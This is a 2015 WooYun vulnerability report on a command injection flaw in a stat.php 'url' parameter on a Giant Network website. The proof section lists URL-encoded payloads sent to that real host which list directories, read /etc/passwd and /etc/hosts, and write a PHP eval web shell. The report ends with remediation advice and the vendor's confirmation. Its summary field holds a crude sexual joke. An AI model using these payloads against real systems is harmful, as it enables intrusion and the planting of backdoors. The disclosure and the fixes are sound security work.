当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142702

漏洞标题:巨人网络某站命令注入漏洞(真正的命令注入)

相关厂商:巨人网络

漏洞作者: mosin

提交时间:2015-09-22 08:23

修复时间:2015-11-08 06:02

公开时间:2015-11-08 06:02

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经确认,细节仅向厂商公开
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开

简要描述:

男:5块?
女:我不是那种人。
男:50块?
女:你当我是什么人。
男:500块?
女:今晚我是你的人。
男:5000块?
女:今晚别把我当人。
男:50000块?
女:不管你来多少人。
男:500000块?
女:不管来的是不是人!

详细说明:

巨人网络某站存在commend注入漏洞,注入地址:

http://ztsj.ztgame.com/stat.php?url=<shell执行命令>


这个命令执行漏洞SQL注入界的危害算是比较大的了。
这个利用起来也比较容易
在这里感谢@五道口杀气的文章:http://drops.wooyun.org/papers/1018
我一直以来只是在理论上了解命令注入,现在有了事例,可以爽一下了。。。
废话不多说了,开干!

漏洞证明:

1:读取当前目录的文件

http://ztsj.ztgame.com/stat.php?url=%27%26ls+%26%27


2.jpg


2:查看当前用户:
权限你们懂得!

http://ztsj.ztgame.com/stat.php?url=%27%26whoami%26%27


3.jpg


3:查看etc目录
http://ztsj.ztgame.com/stat.php?url=%27%26ls+/etc+%26%27

7.jpg


4:读取系统帐号
http://ztsj.ztgame.com/stat.php?url=%27%26cat+/etc/passwd+%26%27

4.jpg


5,查看主机
http://ztsj.ztgame.com/stat.php?url=%27%26cat+/etc/hosts+%26%27

1.jpg


5.jpg


如果我们执行写一句话呢?

http://ztsj.ztgame.com/stat.php?url=%27%26echo+"<?php%20@eval(\$_POST[wuyun])?>"+>>+php.php+%26%27


写入一句话成功

6.jpg


现在我们来连接一句话:

10.JPG


额,失败了,可能有防火墙,或者只允许内网连接..算了吧,不深入了,点到为止吧
在这里我就不写其他小马了,这么多已经可以说明问题了,最后上传一个php.txt证明一下吧!

8.jpg


修复方案:

PHP命令注入攻击漏洞的防范:
PHP中命令注入攻击漏洞带来的危害和影响很严重。防范命令注入攻击漏洞的存在可以通过以下几种方法。
1. 尽量不要执行外部的应用程序或命令。
2. 使用自定义函数或函数库实现外部应用程序或命令的功能。
3. 在执行system、eval等命令执行功能的函数前,确定参数内容。
4. 使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。
5. 使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。这样,在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。
PHP命令注入攻击漏洞是PHP应用程序常见漏洞之一。国内著名的PHP应用程序,如discuz!、dedecms等大型程序在网络中均被公布过存在命令注入攻击漏洞,黑客可以通过命令注入攻击漏洞快速获取网站权限,进而实施挂马、钓鱼等恶意攻击,造成的影响和危害十分巨大。同时,目前PHP语言应用于Web应用程序开发所占比例较大,Web应用程序员应该了解命令注入攻击漏洞的危害,修补程序中可能存在的被黑客利用的漏洞情况,保护网络用户的安全,免受挂马、钓鱼等恶意代码的攻击
详细请参见:

http://www.2cto.com/Article/201208/146517.html

版权声明:转载请注明来源 mosin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-24 06:01

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对巨人网络业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无


漏洞评价:

评论